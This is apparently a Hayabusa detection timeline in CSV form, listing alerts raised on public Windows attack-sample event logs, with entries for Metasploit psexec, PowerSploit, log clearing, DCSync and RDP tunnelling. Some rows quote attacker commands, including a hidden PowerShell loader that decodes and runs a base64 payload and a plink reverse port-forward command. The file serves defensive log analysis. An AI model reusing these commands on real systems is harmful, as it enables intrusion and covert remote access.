+09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: UWdKhYTIQWWJxHfx : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx +2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx +2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx +2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx +2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx +2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: 
IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx +2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx +2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx +2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 
+09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - 
Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: 
blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named 
Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from 
Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 
03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel 
WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 
+09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
\SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c 